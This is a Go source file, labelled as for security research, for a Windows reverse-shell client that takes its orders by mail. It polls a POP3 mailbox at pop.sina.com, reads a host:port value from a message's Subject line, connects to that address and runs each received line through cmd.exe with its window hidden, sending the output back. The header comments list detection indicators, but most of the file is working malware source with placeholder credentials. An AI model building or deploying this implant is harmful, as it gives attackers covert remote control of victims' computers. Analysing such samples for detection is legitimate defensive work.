仅作安全研究
// Sample of a mail-driven remote shell client for Windows, annotated for
// analysis. The program polls a POP3 mailbox, reads a "host:port" value out of
// a Subject line, connects to that address over TCP and runs every line it
// receives through cmd.exe, writing the output back on the same connection.
//
// Observable behavior useful for detection and triage (all taken from the
// code below):
//   - A connection to pop.sina.com:110 roughly every 10 seconds (the loop in
//     main sleeps 10 s between polls). No TLS setup is visible and 110 is the
//     conventional cleartext POP3 port, so the login presumably crosses the
//     network unencrypted; confirm against the go-pop3 library.
//   - An outbound TCP connection to an address that appears nowhere in the
//     binary; it exists only in the mailbox message.
//   - Child processes of the form `cmd /C <line>` started with HideWindow set,
//     so no console window is shown to the user.
//   - Restricting POP3 egress from endpoints and alerting on hidden cmd.exe
//     children of a process that holds network connections both cover this
//     pattern.
package main

import (
	"os/exec"
	"go-pop3"
	"log"
	"strings"
	"net"
	// "fmt"
	"syscall"
	"bufio"
	"time"
)

// reverseshell connects to addr over TCP and executes each received line as a
// cmd.exe command, sending the command's standard output back to the peer.
// The Dial error is discarded; when no connection is obtained the function
// returns without doing anything.
func reverseshell(addr string){
	if c,_:=net.Dial("tcp", addr); c != nil {
		for{
			// One newline-terminated line is read per iteration; the read error is ignored.
			status, _ := bufio.NewReader(c).ReadString('\n');
			// Show the received command (disabled).
			// fmt.Println(status)
			// The peer sending "exit" ends the session.
			if status == "exit\n" {
				break
			}
			// An empty string (original note: the peer pressed Ctrl+C) also ends the session.
			if status == "" {
				break
			}
			// Run the line through cmd.exe and return the result to the peer.
			cmd := exec.Command("cmd", "/C", status)
			// HideWindow suppresses the console window of the child process.
			cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
			// Output captures standard output only; its error is discarded.
			out, _ := cmd.Output();
			c.Write([]byte(out))
		}
	}
}

// Get_Address_to_Rverse_shell logs in to the POP3 mailbox with the given
// credentials, retrieves the highest-numbered message, extracts an address
// from a line containing "Subject:" and passes it to reverseshell.
// A failed dial ends the whole process via log.Fatalf; every later POP3 error
// is logged and the function returns.
func Get_Address_to_Rverse_shell(username string, password string){
	client, err := pop3.Dial("pop.sina.com:110")
	if err != nil {
		log.Fatalf("Error: %v\n", err)
	}
	defer func() {
		client.Quit()
		client.Close()
	}()
	if err = client.User(username); err != nil {
		log.Printf("Error: %v\n", err)
		return
	}
	if err = client.Pass(password); err != nil {
		log.Printf("Error: %v\n", err)
		return
	}
	var count int
	var size uint64
	if count, size, err = client.Stat(); err != nil {
		log.Printf("Error: %v\n", err)
		return
	}
	// The message count and mailbox size are written to the process log.
	log.Printf("Count: %d, Size: %d\n", count, size)
	var content string
	// count is used as the message number, i.e. the last message in the mailbox.
	if content, err = client.Retr(count); err != nil {
		log.Printf("Error: %v\n", err)
		return
	}
	if err = client.Dele(count); err != nil {
		log.Printf("Error: %v\n", err)
		return
	}
	if err = client.Noop(); err != nil {
		log.Printf("Error: %v\n", err)
		return
	}
	// NOTE(review): in POP3 (RFC 1939) RSET clears deletion marks, so if the
	// library maps Dele/Rset directly to the protocol commands, the message
	// carrying the address may still be in the mailbox as evidence. Confirm
	// against the library.
	if err = client.Rset(); err != nil {
		log.Printf("Error: %v\n", err)
		return
	}
	// Process the retrieved message and extract the address.
	list := strings.Split(content, "\r\n")
	for i := 0; i < len(list); i++ {
		line := list[i]
		// Any line of the message that contains "Subject:" is considered, not only the header.
		if strings.Contains(line, "Subject:"){
			addrlist := strings.Split(line, ":")
			// Exactly three colon-separated parts are required: "Subject", host, port.
			if len(addrlist) == 3 {
				temp_addr := addrlist[1] + ":" + addrlist[2]
				// All spaces are stripped to form the "host:port" string.
				ADDR := strings.Replace(temp_addr, " ", "", -1)
				// Called synchronously: polling pauses until the session ends.
				reverseshell(ADDR)
				// go reverseshell(ADDR)
			}
		}
	}
}

// main polls the mailbox in an endless loop, waiting 10 seconds between
// attempts. The credentials are "xxx" placeholders in this listing.
func main(){
	username := "xxx"
	password := "xxx"
	for{
		Get_Address_to_Rverse_shell(username, password)
		time.Sleep(10 * time.Second)
	}
}